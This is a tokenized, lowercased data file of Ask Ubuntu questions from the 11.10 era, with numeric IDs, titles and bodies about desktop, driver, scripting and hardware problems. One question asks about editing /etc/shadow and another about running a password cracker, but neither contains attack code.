73530	can not run vlc from shell script	i am trying to develop a nautilus script which read selected filepath and en-queue in vlc player . problem is if filename is space separated then we need to add extra '\ ' in file name . but when i run the vlc with filename , vlc can not read file . when run in terminal : vlc -- playlist-enqueue filename\ space\ name.extension it just works well but when i try to give same command from bash file then vlc can not read file . my script works for non-space filename . what is the problem ? please help . at least give resource . i googled but can not find suitable solution . thanks in advance edited : my script # ! /bin/sh path= $ nautilus_script_selected_file_paths result= '' '' cnt=0 for i in $ path do if [ $ cnt -eq 0 ] then result= $ i else result= $ result'\ ' $ i fi cnt=`expr $ cnt + 1` done # vlc -- playlist-enqueue `` $ nautilus_script_selected_file_paths '' vlc -- playlist-enqueue `` $ result ''
73531	how do i install a program from terminal with no errors ?	whenever i try to install something through terminal , i try to do it the same way i did it last time . let 's say the program `` samba '' here is what i do : sudo apt-get install `` samba '' it says that their is no such package ! what 's going on ? did i type something wrong ?
73532	ca n't add sublime text to the gnome shell dock	i 've downloaded sublime text for linux ( 32bit ) and put it in /opt , linked it in /usr/bin and currently i can start it by typing sublime_text in console . whenever i start it its icon appears in the shell 's dock but i ca n't pin it , and it does n't appear in the applications menu either . how do i add it ?
73533	seperate x screens with unity and nvidia-current on 8600gtm	i used lucid with gnome2 on this laptop ( dell vostro 1500 , nvidia 8600gt m , external monitor via vga with 1920x1080 ) and installed oneiric because of using a ssd now . i used to have 2 seperate x sessions because i want the desktop not to change on my external monitor when i switch desktops on my laptop display . now on 11.10 i can set up everything with nvidia-settings ( using nvidia-current but tried -updates and the 173 one too ) but it wont work on the external monitor . it either shows a white screen or ( i think when i click into it ) it shows the wallpaper . the mouse remains as `` x '' like in low grafics mode . i tried the xorg.conf from the 10.04 but that didnt work either . is this a known problem/bug ? or is this not supposed to work in unity ( problems with two dashes maybe ) ?
73536	is there a lightweight way to snap windows in lubuntu ?	i 'm looking for a lightweight way to snap windows in lubuntu . it 's possible to install compiz , but doing so will make the system far less lightweight . are there any alternatives or workarounds ?
73539	windows vs ubuntu - audio quality	someone help with this one ... my notebook have a dual-boot ... win7 and ubuntu ... i 've this doubt unexplained until this week ( i pray ) : why the `` window 's audio '' is so much better than `` ubuntu '' , i 've already tested with third party audio systems , and even in my laptop , the diference is so `` scary '' ... i was wondering , if there is someway to decrease these disadvantage ...
73540	how to revert to chrome/chromium 14 ( because 15 is slow ? ) ?	is anyone else finding chrome/chromium 15 slow ? my specific situation involves a page of thumbnails ( where the thumbnail is actually the full image resized using width= and height= ) ; clicking the thumbnail makes the full size image appear in an iframe on the same page . with chrome 14 this was instant , and the machine was immediately available for another click . with chrome 15 , this is still instant , but there then follow several seconds of 100 % processor usage by chrome/chromium as it does goodness-only-knows-what , rendering the entire machine unusable for that period . clicking quickly through the thumbnails is therefore no longer possible . what are the options for reverting to chrome/chromium 14 ( if it is possible at all ) ? i managed to download chromium 14 before it followed chrome in updating to 15 , but now i am being nagged every day to upgrade it as part of the daily updates . can i switch that off ? are there any other options ? i 'd also like to explore downgrading further , to before chrome started pointlessly wasting a 3-pixel deep bar at the top of the page on the f11 full-page view ...
73541	how to install xampp ?	hi all im a noob on ubuntu/linux world , so i need some that give a full tutorial to how to install xampp from apachefriends.org correctly on ubuntu 11.10 + all beyond ubuntu for 32 bit and also 64 bit desktop version.. and also i need this : make a folder on your home folder and linked to htdocs from apache web server make a gui interface for xmapp start xampp when ubuntu boot up or start ubuntu ( note : i ask it for both x86 and x64 so people in the further can see the tutorials ) new data : what i did was i download from apachefriends.org for now and i also what to say that i 'm currently running ubuntu 11.10 x64 bit for dell studio 1558 processor intel i3 i will let you know guys which solution was the best , and it is for a desktop version of ubuntu 11.10 ( laptop 15 inch screen ^_^ ) not server ubuntu
73545	faenza / ubuntu mono power icon problems	im having problems applying a new icon theme in ubuntu 11.10 specifically with the power icon . ive installed faenza succesfully , and the gnome tweak tool to change the icons , but the power icon doesnt seem to be updating : no matter what i change the icon theme to now , i cant seem to get the power icon to return to the default one , let alone the faenza one . any suggestions where im going wrong ?
73555	cmake not finding phonon	i 'm working on a qt application that uses phonon and has cmake as it 's build system . when i try to configure the application i get the following configure output : -- the c compiler identification is gnu -- the cxx compiler identification is gnu -- check for working c compiler : /usr/bin/gcc -- check for working c compiler : /usr/bin/gcc -- works -- detecting c compiler abi info -- detecting c compiler abi info - done -- check for working cxx compiler : /usr/bin/c++ -- check for working cxx compiler : /usr/bin/c++ -- works -- detecting cxx compiler abi info -- detecting cxx compiler abi info - done -- looking for q_ws_x11 -- looking for q_ws_x11 - found -- looking for q_ws_win -- looking for q_ws_win - not found . -- looking for q_ws_qws -- looking for q_ws_qws - not found . -- looking for q_ws_mac -- looking for q_ws_mac - not found . cmake error at /usr/share/cmake-2.8/modules/findpackagehandlestandardargs.cmake:91 ( message ) : could not find qt4 ( missing : qt_phonon_library ) ( found suitable version `` 4.7.4 '' , required is `` 4.4.3 '' ) call stack ( most recent call first ) : /usr/share/cmake-2.8/modules/findpackagehandlestandardargs.cmake:252 ( _fphsa_failure_message ) /usr/share/cmake-2.8/modules/findqt4.cmake:1162 ( find_package_handle_standard_args ) cmakelists.txt:21 ( find_package ) i know my cmakelists.txt is n't the problem because it works fine on other machines . also , i have libphonon-dev installed . anyone know what the problem is ? i feel like i may not have the right phonon package installed . there are so many different ones in the repository . which one is the correct one ?
73557	how to fix `` panic occured switching to text console '' ?	occasionly ubuntu 11.10 freezes and a black screen states `` panic occured switching to text console '' . but after switiching off and switching it on again everything is fine
73558	small caps plugin for gimp	is there a way to create small caps in gimp ? there was a reference to freetext.org at gimptalk , but the plugin does n't exist . i 've installed freetext on my computer , but do n't know how to proceed to make it work with gimp . is there a file i should copy to some gimp directory ? there was also a reference to a small caps plugin , but that does n't seem to be available anymore .
73563	where does empathy go when minimized in gnome3 shell ?	i 'm trying out gnome-shell instead of unity and loving it . unfortunately i ca n't figure out where empathy goes when i click the close button ( there is no minimize button . ) i 'm still logged in because i still get chat messages from people , but i can find no way to open the list of contacts to chat with . there 's no icon in the bottom right pop-up tray for it unless i have a pending message , and i ca n't use that icon to get the user list . the only way i 've found to get the user list is to launch empathy from dash again . my user name in the top right of the screen lists me as available for chat , but also has no way to open the list of people i can message . i 'm wondering if something went wrong in my gnome 3 setup somehow that has caused this because i ca n't find any other people complaining of this specific issue .
73571	shell script to insert line into /etc/passwd , /etc/shadow , /etc/group and save it	can anyone help me to add one line to any file from this : /etc/passwd , /etc/shadow , /etc/group exp ; username : ! ! : âś . add to /etc/shadow by shell script without vi program
73573	how to maximise a window across two monitors ?	it 's easy to maximise windows on a single monitor ( press the maximise button , or drag the window titlebar to the top of the screen ) . how can i maximise a window so that it takes up two screens ?
73576	appearance does not change on switching the theme	if i select radiance or ambiance in the menu show in the following picture , my whole theme does not change . it only changes the title bar . how can i resolve this problem ? or how can i reset the theme to default ?
73577	poulsbo driver on asus eee , natty narwhal	i 'm trying to get set my asus eee pc to use the screen resolution supported by my video card without success . the following commands ran fine but the driver does n't seem to be loaded as i ca n't select any widescreen resolutions . the only options are 1024x768 or 800x600 . sudo add-apt-repository ppa : gma500/emgd sudo apt-get update sudo apt-get install xorg-emgd emgd-dkms emgd-xorg-conf sudo emgd-xorg-conf from : https : //wiki.ubuntu.com/hardwaresupportcomponentsvideocardspoulsbo
73582	how can i get my xps1330 fan to work ?	just upgraded from 11.04 to 11.10 and now my laptop 's fan is not working- my computer gets really warm . i can still run it for about an hour before it gets really hot and i shut it off out of fear that it will fry . i 've been referred to this https : //wiki.ubuntu.com/installingubuntuonadellxpsm1330 but honestly i am new and do n't know how to get powertop to work .
73583	gnome shell titlebar missing	i am using the gnome shell interface on ubuntu 11.10 . the black titlebar with activities , calender , and the notification icons has disappeared . the nautilus menu ( file , edit , view , ect . ) is at the top instead . if i open any applications , they are missing their titlebar and the buttons , and appear in the top left of the screen . does anyone know how to fix this ? i am using a vga graphics card , with no driver . the output of lspci | grep vega is : 00:02.0 vga compatible controller : intel corporation 82915g/gv/910gl integrated graphics controller ( rev 04 ) the output of /usr/lib/nux/unity_support_test -p is : opengl vendor string : tungsten graphics , inc opengl renderer string : mesa dri intel ( r ) 915g x86/mmx/sse2 opengl version string : 1.4 mesa 7.11 not software rendered : yes not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : yes
73585	wubi installer error : the boot configuration data store could not be opened	i 'm trying to install xubuntu using wubi , however , once i start the installer , it runs all the way through ( on the installing xubuntu-11.10 page with the two loading bars ) , and it gets to `` remaining time approximately 0s '' . then , it gives me an error in a message box : an error occurred : error executing command > > command=c : \winows\sysnative\bcdedit /create /d xubuntu /application bootsector > > retval=1 > > stderr=the boot configuration data store could not be opened . the system can not find the file specified . > > stdout= for more information see the log file : ..\local\temp\wubi-11.10-rev245.log
73588	how do i install xulrunner 1.9.2 for crashplan ?	i need to install xulrunner 1.9.2 for crashplan . `` error i get is package is unabailabe but referred to by another package '' what repository do i need to add to be able to install this ?
73589	higher screen resolution for virtualbox ?	i have been trying this for a while but no luck . i installed ubuntu-11.10-desktop-i386 twice . also installed guest additions . however i always get maximum screen resolution as , 1024 x 768 . do i need to change anything in /etc/x11/xorg.conf file ( example ) ? presently there is no such file in that path . also , would you be able to advise me what the contents of the file for 11.10 version should be ?
73590	how to permanently save powertop 's suggestions ?	so it 's ok that if i run powertop then it suggest me to disable xy , etc. , but after i exit powertop , reboot the pc , and start it again [ powertop ] , it brings up the same tips again ! so how can i permanently save the suggestions of powertop ?
73600	what program can i use to open .mld ( recorded webcam ) files ?	i am looking for a program to open video files with the extension .mld ( this is a file from a video recording software i had a long time ago ) . does anybody know any programs in ubuntu that can open such files ? zoals de titel luidt : ik ben op zoek naar een programma dat videobestanden met de extensie .mld kan openen . dit is een bestand van een wecbamrecorder die ik vroeger had op windows . alvast heel erg bedankt .
73606	how do i install openglut ?	i 'm trying to install openglut in ubuntu and i 've downloaded it from sourceforge , but i can not copy it to the /usr directory because it says i do n't have the proper permissions . i 've tried using the sudo cp terminal command but it wo n't work since i 'll have to copy individual files , and let 's face it , there should be a more efficient method of copying stuff . any help ?
73607	wireless connection keeps dropping with an intel 3945abg card	after updating to 11.10 from 11.04 , my wireless connection keeps dropping off from time to time . now , i already experience this problem when i was using 10.04 ( the workaround back then was to replace networkmanager with wicd . but the thing is i 'm not really a fan of wicd and seeing that the problem seems to have been fixed in previous releases , i think there 's a similar solution that i can try . here 's the some more detail of my system $ sudo lshw -c network *-network description : wireless interface product : pro/wireless 3945abg [ golan ] network connection vendor : intel corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : 02 serial : 00:19 : d2 : ad:20:4d width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwl3945 driverversion=3.0.0-12-generic firmware=15.32.2.9 ip=192.168.1.3 latency=0 link=yes multicast=yes wireless=ieee 802.11abg resources : irq:44 memory:84100000-84100fff $ sudo lsmod | grep iwl iwl3945 73329 0 iwl_legacy 71499 1 iwl3945 mac80211 272785 2 iwl3945 , iwl_legacy cfg80211 172392 3 iwl3945 , iwl_legacy , mac80211 $ dmesg [ 43972.920056 ] wlan0 : no ipv6 routers present [ 44533.245630 ] wlan0 : deauthenticating from 94:0c:6d : c0:51 : ca by local choice ( reason=3 ) [ 44533.260462 ] cfg80211 : all devices are disconnected , going to restore regulatory settings [ 44533.260472 ] cfg80211 : restoring regulatory settings [ 44533.260488 ] cfg80211 : calling crda to update world regulatory domain [ 44533.273177 ] cfg80211 : ignoring regulatory request set by core since the driver uses its own custom regulatory domain [ 44533.273181 ] cfg80211 : world regulatory domain updated : [ 44533.273184 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 44533.273188 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 44533.273191 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 44533.273195 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 44533.273198 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 44533.273202 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 44534.078574 ] addrconf ( netdev_up ) : wlan0 : link is not ready [ 44539.626843 ] wlan0 : authenticate with 94:0c:6d : c0:51 : ca ( try 1 ) [ 44539.628827 ] wlan0 : authenticated [ 44539.629214 ] wlan0 : associate with 94:0c:6d : c0:51 : ca ( try 1 ) [ 44539.631514 ] wlan0 : rx assocresp from 94:0c:6d : c0:51 : ca ( capab=0x411 status=0 aid=1 ) [ 44539.631522 ] wlan0 : associated [ 44539.633667 ] addrconf ( netdev_change ) : wlan0 : link becomes ready [ 44551.104169 ] wlan0 : no ipv6 routers present [ 44987.241475 ] wlan0 : deauthenticating from 94:0c:6d : c0:51 : ca by local choice ( reason=3 ) [ 44987.288269 ] cfg80211 : all devices are disconnected , going to restore regulatory settings [ 44987.288279 ] cfg80211 : restoring regulatory settings [ 44987.288294 ] cfg80211 : calling crda to update world regulatory domain [ 44987.309376 ] cfg80211 : ignoring regulatory request set by core since the driver uses its own custom regulatory domain [ 44987.309383 ] cfg80211 : world regulatory domain updated : [ 44987.309385 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 44987.309389 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 44987.309393 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 44987.309396 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 44987.309400 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 44987.309403 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 44988.074180 ] addrconf ( netdev_up ) : wlan0 : link is not ready [ 44993.648439 ] wlan0 : authenticate with 94:0c:6d : c0:51 : ca ( try 1 ) [ 44993.651354 ] wlan0 : authenticated [ 44993.651651 ] wlan0 : associate with 94:0c:6d : c0:51 : ca ( try 1 ) [ 44993.653990 ] wlan0 : rx assocresp from 94:0c:6d : c0:51 : ca ( capab=0x411 status=0 aid=1 ) [ 44993.653995 ] wlan0 : associated [ 44993.655984 ] addrconf ( netdev_change ) : wlan0 : link becomes ready [ 45005.400035 ] wlan0 : no ipv6 routers present thanks ,
73610	since i 've moved to the gnome shell , is it safe to remove compiz ?	i 've uninstalled unity and do n't plan on using it again . i know that the gnome shell uses mutter , so is it safe to uninstall compiz ?
73611	dell inspiron duo crashes when i plug in my charger	good evening everyone , my dell inspiron duo likes to just crash out when i plug in my charger ! ! but i 'm a bit lost how to diagnosis is - ideas ? ?
73613	why can i only put some items in the launcher ?	whenever i search for an item using dash it knows the default way of opening it . however if i drag a file into the launcher it ca n't be added , even if it is executable . for example if you would like minecraft to show up you will have to add a custom launcher , or if you use dash to find a pdf file , you can double click it and it opens evince however you can not drag it into the launcher . the animation surrounding this behavior suggests that this was done by design . why is this useful or necessary ? is it a bug ?
73615	gnome 3.2 problems in the shell	does anyone experienced some problems in gnome 3.2 environment , like problems in the shell ? how can i fix it ? i have made a test , if there was some problem on graphics , but everything seems fine :
73616	how to set the sound setting so that you can `` listen to this device '' ( i.e an external microphone )	i have ubuntu 11.04 , and i would like to set my sound setting so that when i use my external microphone i can hear myself speak into the microphone as if it 's a karaoke . i went to the sound setting , but it does n't have the option to `` listen to this device '' as i can find in windows . is this an option in ubuntu ?
73619	executable not running even after chmod'ing it	i am trying to run a beta precompiled copy of rcracki .. but the problem is when i try to run the executable , it gives an error : i tried to format the snippet below into one code block , but it did n't look nice .. : p root @ hosted-by : ~/desktop/rcracki_mt_0.7_beta2_linux_x86_64 # ls copying installing.txt charset.txt libcudart.so.2 libstdc++.so.6 rcracki_mt.ini changelog.txt readme.txt libcrypto.so.0.9.8 libgcc_s.so.1 rcracki_mt root @ hosted-by : ~/desktop/rcracki_mt_0.7_beta2_linux_x86_64 # sudo chmod +rwx rcracki_mt root @ hosted-by : ~/desktop/rcracki_mt_0.7_beta2_linux_x86_64 # ./rcracki_mt bash : ./rcracki_mt : no such file or directory root @ hosted-by : ~/desktop/rcracki_mt_0.7_beta2_linux_x86_64 # sudo ./rcracki_mt sudo : unable to execute ./rcracki_mt : no such file or directory so does anyone have a clue as to why ubuntu gives this error ? .. i mean the file is right here , so the error does n't make sense .. ? ! ` by the way , i 'm using ubuntu 10.04 ..
73620	ca n't use gnome shell extensions due to `` error parsing schema ''	i get this error in the gnome-tweak-tool konsole dialog critical : error parsing schema org.gnome.shell ( /usr/share/glib-2.0/schemas/org.gnome.shell.gschema.xml ) and then a series of other errors which state 'unknown extension error ' . all of the extensions show , but none of them can be switched on . any ideas ?
73622	kazam screencaster in 11.10 ?	i 've been trying to find a good screen capturing program , and i 've read some great reviews about kazam , but they 've all been with earlier versions of ubuntu . is it possible to install kazam in 11.10 ? i 've tried adding the unstable ppa to software sources , then running sudo apt-get kazam , but no luck . i 've tried the unstable daily build ppa , as that seemed to be the only one that was supporting oneiric ( it had packages for oneiric , whereas in the stable daily build ppa , the packages were for lucid and maverick ) . http : //launchpad.net/~and471/+archive/kazam-daily-builds
73624	how do i turn off the ctrl-shift-r keyboard shortcut ?	as an eclipse user ctrl-shift-r is a pretty important shortcut for me . lately in ubuntu however , something has overriden this shortcut . when i type ctrl-shift-r all keyboard input is frozen until i press esc . it 's not eclipse because i get the same effect in any application . how can i find out what is listening to this shortcut and turn it off ? i checked under keyboard settings but it was n't listed . any advice would be greatly appreciated , this is driving me nuts .
73625	new dyndns server at home needs more security	i have just setup an ubuntu web server to use at home as a backup and development server for a website i have . i am using dyndns so my colleges can access this also and test new code . this works well but im worried about security . this has only been open to the world for 24 hours and already had hack attempts from 4 different ip addresses . ( korea and hong kong ) hack attempts being trying to login over ssh with usernames such as root , oracle , smbuser how can i secure this server more so i can feel at ease ? fyi , the data is not highly confidential so not the end of the world if anyone gets in , but obviously do n't want people playing around with it . thanks update , i did add my public ssh key to the server to login but after a restart went back to normal
73626	script not running on resume	i am running 11.04 on an asus ul30 . i am trying to run a script to fix my synclient settings ( which are lost during resume ) . i have written the following script in /etc/pm/sleep.d/10_touchpad : # ! /bin/sh # change synclient settings on resume case `` $ 1 '' in resume|thaw ) sleep 15 & & synclient tapbutton2=2 tapbutton3=3 ; ; esac /var/log/pm-suspend shows the following : /etc/pm/sleep.d/10_grub-common suspend suspend : success . running hook /etc/pm/sleep.d/10_touchpad suspend suspend : /etc/pm/sleep.d/10_unattended-upgrades-hibernate resume suspend : success . running hook /etc/pm/sleep.d/10_touchpad resume suspend : failed to connect to x server . /etc/pm/sleep.d/10_touchpad resume suspend : success . running hook /etc/pm/sleep.d/10_grub-common not really sure why the synclient changes are n't being chnaged by this script on resume . would appreciate any insight ... .
73628	will asus pci-sc200 work with ubuntu ?	i have a few piece of hardware from an early paleozoic period that i am trying to get to work on ubuntu . namely a dds1 tape drive with scsi1 interface . i need to pick up a scsi1 or scsi2 adapter with pci interface that will work under ubuntu . currently considering asus pci-sc200 , but ca n't quite figure out if it will work ok under ubuntu ( 10.10 ) . if you have experience hooking up this scsi2 adapter to a ubuntu machine would really appreciate an advice if it 's a good choice .
73630	could not obtain c # compiler error when using monodevelop	i dont know whether this is considered a programming question or not , so correct me if im wrong . how can i get mono develop to compile my c # projects ? at present it wont build , and i get an error saying 'could not obtain c # compiler , c # compiler not found for mono / .net 3.5 ' as i understand it , the c # compiler for mono is dmcs . calling dmcs from terminal works fine . how can i get mono develop to build correctly ?
73633	how to change the timing on the screensaver	how can i change the timing of when the screensaver kicks in ? the time period set in the screensaver to kick in is too short and i would like to change this timing period to a larger value . how does one do that ?
73638	duplicate icons in gnome shell	a fellow user came across a problem , and it 's the exact same one that i 'm having . i 'm just reposting here to see if there 's a faster response ( original ubuntu forums post ) : so i have upgraded to oneiric and i was excited to get gnome 3 and so i did and it 's great , but in the applications menu many of the icons are showing double , which is strange . one will be clear and the next will be pixely . also , this only happens when i 'm in the `` all '' category , and with the faenza icon set the pixely one is not in the faenza style . i 'm not quite sure how to fix this problem and i need some help . a google search turns up mostly closed fedora-related bugs , so i 'm not sure what i should do to try to fix this . any help would be greatly appreciated !
73639	what are kswapd0 , kworker/num : num , ksoftirqd/num ?	exactly what are these services / programs . apparently they make my system almost useless . any one of them at point of time uses at least 50 % cpu and continuous access to hdd . i 'm not exactly sure what exactly caused these to start . but here are few things i 've done ( right before i noticed laptop being unuseful ) : starting gwibber services for twitter . installing mbrola ( speech synthesis ) installing gespeaker ( downloaded from net its not available in repos ) . and i think all these services starts when i start any google page ( gmail , google+ etc . ) -- maybe related to google talk plugin ? i 'm gon na try not opening one of these pages ( not sure for how long though ) thanks
73646	should i install the nvidia drivers for my computer after i 've installed bumblebee ?	i 'm running an optimus enabled laptop . i installed bumblebee and everything seems to work great . however i 'm confused what i should do next . should i install the nvidia drivers for my computer or would that screw everything up ? thanks for your help !
73650	wine error - ca n't execute because its an .exe file	i 'm trying to run a windows executable mounted through archive mounter . i followed the directions of a previous answer , which was 'open with iso master , change permissions of the file ( s ) , save the .iso , mount that .iso through archive mounter , then execute the file through the mounted .iso ' this didnt work . i spent well around 2 hours trying to get this to work , and im at my wits end now . is there any person out there that can offer a step by step solution to get my .iso file ( and the .exe files therein ) to work with wine , mounted in archive mounter , without giving me the same annoying `` cant execute because its an .exe file ' nonsense ? the file im trying to run is an autorun.exe file for a video game . im trying to install it on wine . the operating system is ubuntu 10.04 im running on 10.04 lucid lynx .
73656	fixed `` no space left '' error by formatting usb drive	i 've been backing up to a 4gb usb drive.after upgrading to 11.10 i got `` no space left '' error in deja-dup . i deleted the cache file , but that did n't help . since my home folder is < 4 gb , i thought i 'd try to reformat the drive . could n't do that in ubuntu , because a backup drive is `` in use '' as soon as it 's mounted . so i reformatted the drive on my windows machine , and then i was able to make a new back-up .
73658	how to purge items from dash menu	i 've just failed at installing itunes in wine - it looked absolutely horrible . since i 've removed it using playonlinux , it 's still showing up in the start menu ( when i press my windows key , the full screen that comes up full of apps ) . how do i purge this from this screen ? i 'm tired of looking at broken shortcuts and stuff that sits there and does n't work . is there a file or something i can go in and fool around with ?
73662	where is a good guide to remote participation in the ubuntu developer summit , and is it upgraded with each summit ?	is there a guide to properly participating in uds remotely ?
73667	keyboard shortcut to reveal onscreen keyboard	does someone know if it is possible to bind a command to a button which will reveal the onscreen keyboard ? ( note : the onscreen keyboard has already be started . ) currently when i want to reveal the onscreen keyboard , i have to click the keyboard icon in the tray bar . this is not very convenient mainly because the onscreen keyboard does not reveal itself when you are yet still focused on a text field . hence i want to bind it to a button .
73687	what is the correct way to change permissions of the printer in /dev/usb/lp0 ?	i use some commands to print text . however , when i connect my printer it becomes available under /dev/usb/lp0 , which is owned by root and as a regular user i do not have access to this device . what is the proper way of obtaining automated access ? ( automated in the sense that this permission should be automatically set when the printer is connected , and should not required typing a command manually every time it is connected ) .
73690	impossible to run ubuntu ?	i 've been trying for a while to run ubuntu , but nothing i do seems to work ( outside of a virtual machine , and i 'd really rather not run it in a virtual machine ) . i 've tried using wubi to install it , but i get an error ( see the post ) and i 've tried to install it to a live usb ( see the post ) but nobody has been able to help me with either of those two problems , and i 've asked on multiple websites . am i just doomed to fail ? i really want to run ubuntu without completely removing windows . is there any other options ? what else can i do ?
73693	how to change desktop only font color ?	my desktop font are not so legible with some background , so i want the old gnome behaviour . i managed to choose a custom desktop font following this answer , but i want to change color and possibly a text shadow . it 's theme depending ? what i have to edit ? i 'm using 11.10 , both gnome shell and unity .
73695	how to prevent hangs of nautilus or krusader when nas is disconnected ?	i tried to find a solution for this and i failed . i mount my nas to my laptop , but when the connection is down the file-manager hang for a lot of time ... since this is a laptop , and it is on the go , the nas is not available all the time . the best solution so far is to mount and unmount the drive depending no the connection the laptop is using . i used wicd to run a script when my laptop is connected to my home network , and pre-disconnect script to unmount when i am switching off or hibernating the pc . unfortunately , wicd will not work correctly for me with ubuntu 11.10 . i am looking for a way to simulate this behavior without wicd , or another solution . i have tried unmount - l script in ifdown.d folder , but this does not work , the managers will still hang . right now i am 'bookmarking ' the location of the nas drive , but this method is very clumsy and inconvenient ...
73696	what is the proper terminal-way to shutdown ?	i was trying to shutdown my pc through ssh . i executed sudo shutdown now the user was logged-out and ubuntu starting turning off , but it froze at the last screen with the ubuntu logo and the loading dots . any idea where the problem might be ? also , what 's the difference between shutdown and halt ? what other similar commands are there ?
73699	how to extend the battery life on my laptop when running ubuntu ?	i have a little problem . i bought a pavilion g4 with windows 7 , but i really hate windows , so i installed ubuntu on it . on windows , the laptop 's battery lasts longer than it does on ubuntu . i 've also noticed that the processor is constantly running , because on windows the laptop 's internal temperature is not as high as it is on ubuntu . i read something about wakeups and that some processes have 150 to 500 wakeups per second .
73706	using vmbuilder to build an 11.10 vm from 10.04 ?	i am running lucid and want to build an oneiric vm using vmbuilder . i run this command : sudo vmbuilder kvm ubuntu -- suite oneiric -- flavour virtual \ -- arch i386 -o -- libvirt qemu : ///system -- user user -- name user \ -- pass user -- addpkg imagemagick -- mirror http : //localhost:9999/ubuntu \ -- addpkg acpid and get this error message : vmbuilder.exception.vmbuilderusererror : invalid suite : `` oneiric '' . valid suites are : dapper gutsy hardy intrepid jaunty karmic lucid how can i add the ability to create vms for newer releases ?
73707	how do i write to my macintosh hd partition ?	i have ubuntu dual booting on my macbook . when i tried to move a file from my home folder to a folder on the mac file system it would n't work . in the shell i get this error inter-device move failed : `foo ' to `/media/macintosh hd/home/foo ' ; unable to remove target : read-only file system
73709	how do i delete all empty directories in a directory from the command line ?	say i have a directory named `` foo '' . this folder is full of other directories . how can i delete all the empty directories in one command ?
73710	how can i adjust cpu frq . in lubuntu ?	in gnome 2 there was panel applet that one could use to do that , however in lubuntu there is n't one , how can i adjust it then ? . preferably with a simple method , do n't really want to directly edit any system file .
73716	windows do n't behave properly on a second monitor in gnome3	using the unity interface i have no problems with my dual monitor setup . however , when i load gnome 3 , windows placed on my second monitor do n't act right . i can only place windows on the left and right hand sides of the second monitor , with a 'gap ' in the center where no window can be placed . the second monitor seems to be divided into 3 sections , 1 ( left ) , 2 ( center ) , and 3 ( right ) where windows can be placed in 1 and 3 but not 2 . if i try to drag a window from 1 into 2 , it 'jumps ' to 3 . likewise if i try to drag a window from 3 to 2 it 'jumps ' to 1 . i am running an optimus enabled laptop , nvidia geforce 540m . drivers are not installed , and running bumblebee . this does not happen on my laptop monitor , which i assume is the designated primary monitor . the second monitor is connected via vga . this does not happen if i load with unity 3d . i hope this is clear ! ! thanks for your help !
73719	not able change desktop background in ubuntu 11.04	i am unable to change my desktop back ground picture , please help . deena
73720	screen stretch / compress for hdmi monitor ?	i have an hdmi external monitor . when i connect it , about 28 pixels are lost past the edges of the screen . there is no option to stretch / compress the screen in hdmi input mode . any options short of creating a custom screen resolution ... ? thanks !
73721	how do i change the default chinese font ?	i 've installed two chinese fonts from the repos : uming and ukai . i like better how ukai looks , but the default font picked by ubuntu ( when selecting a non-chinese font ) is uming . for example , my desktop font is droid sans , but the chinese caracters are picked from uming . how can i choose ukai for the default chinese font ? p.s . if i just change the desktop font to ukai , i wo n't get the droid sans latin characters , so that 's not a solution .
73722	ubuntu 11.10 and compiz config	i have clean installed 11.10 on my pc . when i am configuring compiz with cconfig ( from ubuntu software center ) , gtk and all panels disappears . do n't you know solving or just compiz alternative to create pretty interface on my linux ?
73723	bluetooth is not working properly on a dell xps 15	i have dell laptop ( xps 15-sandy-bridge ) . i was using ubuntu 11.04 and the bluetooth was working properly . however , once i installed ubuntu 11.10 the bluetooth my laptop can detect bluetooth devices but can not pair connection and can not send/receive files . can anyone help on this problem ?
73727	right click on chrome , eclipse , etc.. triggered double click instead of single click	in my current ubuntu 10.10 , every time i right click on a link in chrome , the first option in right-click-menu is selected immediately instead of letting my choosing . the same thing happened in my indigo eclipse . i 'm using ubuntu 10.10 on pc with amd graphics card
73728	which is the best way to version a lot firefox 's profiles ? . git , dropbox/ubuntuone or better option	my case is the following , i want to find the best way to have as many firefox 's profiles as i want . i used to solve this problem with firefox sync before they limit the number of account per mail . i reach 7 profile with the same email account but right now that is not possible anymore , so i was thinking in option like this firefox sync as i say limit the number of accounts by email , but it 'll perfect if mozilla 's people allow it again . personal server , may be the best option , but my actual hosting does n't support mercurial and i have no experience with it . using dropbox/ubuntuone sync could be a nice way , but i 'm not sure about security , and eventually will represent a expense that i can not afford . with git i think could be pretty useful , at least in theory because i can use it for different distro/different versions of firefox , even merge/branch on external hd . but i dont know if is handy to do . i like your opinion over my personal limitation about server , knowledge , finance . perhaps , with your ideas i can find another solution that fit my case . thank you all in advance . p.d , maybe it is obvious , but it is important that any solution involves ubuntu , that why i asking here , at least ubuntu-based distrosa little bit of git on firefox , but so far it is not going so well , because many files are created once you run a profile , and other are deleted once close it . so i find this underestimate
